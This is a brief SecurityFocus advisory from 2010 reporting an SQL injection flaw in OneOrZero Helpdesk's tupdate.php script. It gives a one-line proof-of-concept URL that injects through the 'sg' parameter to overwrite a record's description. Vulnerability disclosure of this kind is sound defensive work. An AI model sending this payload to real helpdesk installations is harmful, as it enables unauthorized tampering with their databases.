OneOrZero Helpdesk TUpdate.PHP SQL Injection Vulnerability

The following proof of concept has been supplied:

http://www.example.com/supporter/tupdate.php?groupid=change&sg=groupid,description=char(97,98,99,100)&id=10


 

Privacy Statement
Copyright 2010, SecurityFocus